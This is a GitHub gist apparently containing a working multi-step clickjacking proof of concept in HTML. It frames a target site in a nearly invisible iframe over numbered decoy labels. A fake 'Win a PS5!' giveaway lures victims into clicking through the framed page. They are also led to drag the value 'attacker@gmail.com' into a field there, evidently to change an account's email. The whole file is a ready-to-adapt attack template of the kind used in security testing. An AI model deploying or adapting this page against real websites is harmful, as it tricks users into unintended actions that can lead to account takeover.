Gist hoodoer/2e8b576b165fc958053a0b75697f516d
Simple multi-step clickjacking POC
<!DOCTYPE html>
<html>
<head>
  <title>POC</title>
  <style>
    /* The framed target page: almost fully transparent and stacked above the decoy labels,
       so clicks on the visible numbers land on the framed page instead */
    #target_website {
      position: relative;
      width: 1000px;
      height: 1000px;
      opacity: 0.1;
      z-index: 2;
    }
    /* Decoy labels, positioned underneath the spots in the framed page the victim is led to click */
    .firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick {
      position: absolute;
      top: 330px;
      left: 60px;
      z-index: 1;
    }
    .firstClick  { left: 150px; top: 470px; }
    .secondClick { left: 710px; top: 345px; }
    .thirdClick  { left: 710px; top: 430px; }
    .fourthClick { left: 620px; top: 775px; }
    .fifthClick  { left: 543px; top: 482px; }
    /* The original gist carried this declaration with no selector, so it applied to nothing;
       it is kept here only as a comment: { background-color: rgb(255, 122, 89); } */
  </style>
</head>
<body style="background-image: url('TrustedSec-Logo.svg'); background-repeat: no-repeat; background-size: 100% 100%">
  <h1>Win a PS5!</h1>
  <div>Click all numbers in order correctly to be entered to win!</div>
  <div>Sponsored by TrustedSec</div>
  <div class="firstClick">1</div>
  <div class="secondClick">2</div>
  <div class="thirdClick">3</div>
  <div class="fourthClick">4</div>
  <div class="fifthClick">5</div>
  <iframe id="target_website" src="https://domain.com"></iframe>
  <!-- Targets can type into hidden text fields, or drag something there that drops the desired text (see below) -->
  <!-- Moved out of the <iframe> element: markup between <iframe> tags is fallback content that
       browsers with iframe support never render, so the original placement showed nothing -->
  <div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>